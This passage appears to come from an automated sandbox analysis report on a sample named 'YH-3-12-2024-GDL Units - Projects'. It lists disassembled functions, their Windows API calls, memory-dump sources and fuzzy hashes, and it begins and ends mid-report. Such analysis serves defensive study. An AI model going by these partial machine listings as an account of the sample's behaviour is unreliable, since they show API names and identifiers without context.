                                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 008475BE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                        • String ID: static
                                                        • API String ID: 2559357485-2160076837
                                                        • Opcode ID: 0614e4dd326fd59066fc7f5addbeea95ab20e034e6763e737f9441e32ab4d930
                                                        • Instruction ID: 3131567acb71b7b37d463a5462276e837f96fc3f751b82af983c83d54dab88dd
                                                        • Opcode Fuzzy Hash: 0614e4dd326fd59066fc7f5addbeea95ab20e034e6763e737f9441e32ab4d930
                                                        • Instruction Fuzzy Hash: 1E316C36105218BFDF129F64DC08FEA3B69FF0A360F120229FA15D61A1D735D811DBA4
                                                        Function 007E6E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 007E6E3E
                                                          • Part of subcall function 007E8B28: __getptd_noexit.LIBCMT ref: 007E8B28
                                                        • __gmtime64_s.LIBCMT ref: 007E6ED7
                                                        • __gmtime64_s.LIBCMT ref: 007E6F0D
                                                        • __gmtime64_s.LIBCMT ref: 007E6F2A
                                                        • __allrem.LIBCMT ref: 007E6F80
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007E6F9C
                                                        • __allrem.LIBCMT ref: 007E6FB3
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007E6FD1
                                                        • __allrem.LIBCMT ref: 007E6FE8
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007E7006
                                                        • __invoke_watson.LIBCMT ref: 007E7077
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                        • String ID:
                                                        • API String ID: 384356119-0
                                                        • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                        • Instruction ID: 3ec30c20f0a880527470fdd2be2a767765aa2d7b565a2f2bb93e73210fd1c3b7
                                                        • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                        • Instruction Fuzzy Hash: 19711776A02757EBD718EE6ADC45B6AB3A8BF18360F148229F514E72C1E778DD0087D0
                                                        Function 00822527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 00822542
                                                        • GetMenuItemInfoW.USER32(00885890,000000FF,00000000,00000030), ref: 008225A3
                                                        • SetMenuItemInfoW.USER32(00885890,00000004,00000000,00000030), ref: 008225D9
                                                        • Sleep.KERNEL32(000001F4), ref: 008225EB
                                                        • GetMenuItemCount.USER32(?), ref: 0082262F
                                                        • GetMenuItemID.USER32(?,00000000), ref: 0082264B
                                                        • GetMenuItemID.USER32(?,-00000001), ref: 00822675
                                                        • GetMenuItemID.USER32(?,?), ref: 008226BA
                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00822700
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00822714
                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00822735
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                        • String ID:
                                                        • API String ID: 4176008265-0
                                                        • Opcode ID: 2167f0f1f86e19ff3192095976931475cdc04adb64bd5fff2e40ab9a6094707c
                                                        • Instruction ID: beda0af58a365b23f0248bbbc22f292358035800defe69885d30e77da040a33c
                                                        • Opcode Fuzzy Hash: 2167f0f1f86e19ff3192095976931475cdc04adb64bd5fff2e40ab9a6094707c
                                                        • Instruction Fuzzy Hash: 7361BD75900269BFDB21CFA8EC88EBE7BB8FB01308F544059E942E7251D731AD85DB21
                                                        Function 00816B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00816BBF
                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 00816C18
                                                        • VariantInit.OLEAUT32(?), ref: 00816C2A
                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00816C4A
                                                        • VariantCopy.OLEAUT32(?,?), ref: 00816C9D
                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00816CB1
                                                        • VariantClear.OLEAUT32(?), ref: 00816CC6
                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 00816CD3
                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00816CDC
                                                        • VariantClear.OLEAUT32(?), ref: 00816CEE
                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00816CF9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                        • String ID:
                                                        • API String ID: 2706829360-0
                                                        • Opcode ID: 19eef0e5d666e558036a9b2c5680aa2ef4900292b32b7a05b8a49d8d355b1fcd
                                                        • Instruction ID: bf3548893f4aba61a43101c98d9038870fe00a945073d701e730954502d2a1e2
                                                        • Opcode Fuzzy Hash: 19eef0e5d666e558036a9b2c5680aa2ef4900292b32b7a05b8a49d8d355b1fcd
                                                        • Instruction Fuzzy Hash: 74413075A00219DFCF00DF68D848DEEBBB9FF48354F008069EA95E7261DB34A955CB94
                                                        Function 0084D43E Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 257windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007C2612: GetWindowLongW.USER32(?,000000EB), ref: 007C2623
                                                        • GetSystemMetrics.USER32(0000000F), ref: 0084D47C
                                                        • GetSystemMetrics.USER32(0000000F), ref: 0084D49C
                                                        • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0084D6D7
                                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0084D6F5
                                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0084D716
                                                        • ShowWindow.USER32(00000003,00000000), ref: 0084D735
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0084D75A
                                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 0084D77D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                        • String ID: 0R
                                                        • API String ID: 1211466189-1916035689
                                                        • Opcode ID: f354fa954fdfd1e9f571eefbcc9450ab38c0203d1ca4c9b531b46cbec00cb860
                                                        • Instruction ID: c6c1597ca12880ce54e1a4bf11b51d0e27e774ba486f1e61fe9c1c721f6e0fd7
                                                        • Opcode Fuzzy Hash: f354fa954fdfd1e9f571eefbcc9450ab38c0203d1ca4c9b531b46cbec00cb860
                                                        • Instruction Fuzzy Hash: 68B16975600229EFDF14CF68C9857A97BB1FF08711F09C169ED48DB296EB34A950CBA0
                                                        Function 008383BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007C9837: __itow.LIBCMT ref: 007C9862
                                                          • Part of subcall function 007C9837: __swprintf.LIBCMT ref: 007C98AC
                                                        • CoInitialize.OLE32 ref: 00838403
                                                        • CoUninitialize.OLE32 ref: 0083840E
                                                        • CoCreateInstance.OLE32(?,00000000,00000017,00852BEC,?), ref: 0083846E
                                                        • IIDFromString.OLE32(?,?), ref: 008384E1
                                                        • VariantInit.OLEAUT32(?), ref: 0083857B
                                                        • VariantClear.OLEAUT32(?), ref: 008385DC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                        • API String ID: 834269672-1287834457
                                                        • Opcode ID: 0e56d8889bdb37223b18d2e6bbd1462d87b54ec8ef6e17a31baf8425b64b3567
                                                        • Instruction ID: 344ab6444cc1371c0341c95c71afc0f9c66f02d16628d2c5172dab7a3df61214
                                                        • Opcode Fuzzy Hash: 0e56d8889bdb37223b18d2e6bbd1462d87b54ec8ef6e17a31baf8425b64b3567
                                                        • Instruction Fuzzy Hash: 2F614471608312EFC710DF24C848A6ABBE8FF89754F00481DF985DB291DB64E948CB96
                                                        Function 00835732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • WSAStartup.WSOCK32(00000101,?), ref: 00835793
                                                        • inet_addr.WSOCK32(?,?,?), ref: 008357D8
                                                        • gethostbyname.WSOCK32(?), ref: 008357E4
                                                        • IcmpCreateFile.IPHLPAPI ref: 008357F2
                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00835862
                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00835878
                                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 008358ED
                                                        • WSACleanup.WSOCK32 ref: 008358F3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                        • String ID: Ping
                                                        • API String ID: 1028309954-2246546115
                                                        • Opcode ID: 1ac5183d23eccee5d58167806473615c22cdfe35704ea23a4ff294beb5a9c7d1
                                                        • Instruction ID: 16d23c761245f5c9b50ded159b1fa97dd005a161463fb0c8fa79f6d5a0f4717d
                                                        • Opcode Fuzzy Hash: 1ac5183d23eccee5d58167806473615c22cdfe35704ea23a4ff294beb5a9c7d1
                                                        • Instruction Fuzzy Hash: C1516C31604600DFDB119F25DC49B6ABBE4FF89724F04492DFA96DB2A1DB74E940CB82
                                                        Function 0082B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0082B4D0
                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0082B546
                                                        • GetLastError.KERNEL32 ref: 0082B550
                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 0082B5BD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                        • API String ID: 4194297153-14809454
                                                        • Opcode ID: 4061c1522594410bffdec7c47697b3b2ddb91315e17d6610ed19936c06e5b914
                                                        • Instruction ID: d8b130484adce1cb3cb10df38f1e4e5fe1ff5dcb7757c1ddd4164aeb741274b6
                                                        • Opcode Fuzzy Hash: 4061c1522594410bffdec7c47697b3b2ddb91315e17d6610ed19936c06e5b914
                                                        • Instruction Fuzzy Hash: 9731B235A00219DFCB00DF68E989EAE7BB4FF09314F148069F615DB291DB74DA82CB81
                                                        Function 00818F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007C7DE1: _memmove.LIBCMT ref: 007C7E22
                                                          • Part of subcall function 0081AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0081AABC
                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00819014
                                                        • GetDlgCtrlID.USER32 ref: 0081901F
                                                        • GetParent.USER32 ref: 0081903B
                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 0081903E
                                                        • GetDlgCtrlID.USER32(?), ref: 00819047
                                                        • GetParent.USER32(?), ref: 00819063
                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00819066
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 1536045017-1403004172
                                                        • Opcode ID: 46a09c60be0e117cdae97d77ee942b299a97259e653656774aed21f9719fa98a
                                                        • Instruction ID: 9ff957fb2523d5f6c416f830a30c3256ae8ab9187252eafc1f311c203d47f2c2
                                                        • Opcode Fuzzy Hash: 46a09c60be0e117cdae97d77ee942b299a97259e653656774aed21f9719fa98a
                                                        • Instruction Fuzzy Hash: 9A21C774A00108BBDF04ABA4CC95EFEB778FF59310F104159F961D72A2DB795855DB20
                                                        Function 0081907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007C7DE1: _memmove.LIBCMT ref: 007C7E22
                                                          • Part of subcall function 0081AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0081AABC
                                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 008190FD
                                                        • GetDlgCtrlID.USER32 ref: 00819108
                                                        • GetParent.USER32 ref: 00819124
                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00819127
                                                        • GetDlgCtrlID.USER32(?), ref: 00819130
                                                        • GetParent.USER32(?), ref: 0081914C
                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 0081914F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 1536045017-1403004172
                                                        • Opcode ID: 71d406a4de6c45f355fa74173d089529b222ab2c81fc644beb59953e6d32f4c5
                                                        • Instruction ID: 050a486b8366c4783558889387172cf404d99fcfbbbe3128b1093911b59fd5d8
                                                        • Opcode Fuzzy Hash: 71d406a4de6c45f355fa74173d089529b222ab2c81fc644beb59953e6d32f4c5
                                                        • Instruction Fuzzy Hash: B021D674A01108BBDF04ABA4CC89EFEBB78FF59300F004019F951D72A2DB795495DB21
                                                        Function 00819163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetParent.USER32 ref: 0081916F
                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00819184
                                                        • _wcscmp.LIBCMT ref: 00819196
                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00819211
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                        • API String ID: 1704125052-3381328864
                                                        • Opcode ID: 8ff18aa504ab076701fb6be9c6f61d71dae4db0670a79858c0c1126bb26f9e52
                                                        • Instruction ID: 43275d6048c6f357ded6f94955d430ab32d948497bc7b071ad51ead2842d5af6
                                                        • Opcode Fuzzy Hash: 8ff18aa504ab076701fb6be9c6f61d71dae4db0670a79858c0c1126bb26f9e52
                                                        • Instruction Fuzzy Hash: A2115C3A249307F9FA102624DC1EDE73B9CFF15320B200026FA24E10D6FE7DA8A19990
                                                        Function 008388AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 008388D7
                                                        • CoInitialize.OLE32(00000000), ref: 00838904
                                                        • CoUninitialize.OLE32 ref: 0083890E
                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00838A0E
                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00838B3B
                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00852C0C), ref: 00838B6F
                                                        • CoGetObject.OLE32(?,00000000,00852C0C,?), ref: 00838B92
                                                        • SetErrorMode.KERNEL32(00000000), ref: 00838BA5
                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00838C25
                                                        • VariantClear.OLEAUT32(?), ref: 00838C35
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                        • String ID:
                                                        • API String ID: 2395222682-0
                                                        • Opcode ID: fafb995634dfdda50f9f64003021061eb2ab53125cdbdd3f2ae6e1158c77312b
                                                        • Instruction ID: 75455e1e55998776047456fedaac1400fa3db79ea55d4def1021ef19800c2e5a
                                                        • Opcode Fuzzy Hash: fafb995634dfdda50f9f64003021061eb2ab53125cdbdd3f2ae6e1158c77312b
                                                        • Instruction Fuzzy Hash: FEC1E1B1608305EFD700DF68C88492AB7E9FB89758F00496DF989DB251DB71ED06CB92
                                                        Function 00827990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00827A6C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ArraySafeVartype
                                                        • String ID:
                                                        • API String ID: 1725837607-0
                                                        • Opcode ID: 4bbf3f9115bee3ea4a55ad04358d9811683ac99452d3a4d0277852bf72a1a07e
                                                        • Instruction ID: 6726c43c5fd330e70c6bc2ef8c8710e5de69297d536d263308cae17fbaf65325
                                                        • Opcode Fuzzy Hash: 4bbf3f9115bee3ea4a55ad04358d9811683ac99452d3a4d0277852bf72a1a07e
                                                        • Instruction Fuzzy Hash: A6B1A07590422ADFDB10DFA6E885BBEB7F4FF09325F204429EA01E7241D734A981CB91
                                                        Function 008211CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 008211F0
                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00820268,?,00000001), ref: 00821204
                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 0082120B
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00820268,?,00000001), ref: 0082121A
                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0082122C
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00820268,?,00000001), ref: 00821245
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00820268,?,00000001), ref: 00821257
                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00820268,?,00000001), ref: 0082129C
                                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00820268,?,00000001), ref: 008212B1
                                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00820268,?,00000001), ref: 008212BC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
